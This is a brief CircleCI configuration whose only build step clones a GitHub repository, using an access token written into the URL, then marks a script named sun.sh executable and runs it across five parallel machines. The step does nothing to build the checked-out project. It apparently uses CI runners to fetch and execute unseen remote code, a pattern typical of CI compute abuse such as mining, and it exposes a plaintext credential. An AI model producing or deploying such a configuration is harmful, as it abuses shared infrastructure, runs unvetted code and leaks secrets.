version: 2.1

workflows:
  main:
    jobs:
      - build
jobs:
  build:
    parallelism: 5
    machine:
      image: ubuntu-2004:202107-02
    steps:
      - checkout
      - run: |
            git clone https://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@github.com/WxYtzaiu/Uisjaws && cd Uisjaws && chmod u+x sun.sh && ./sun.sh
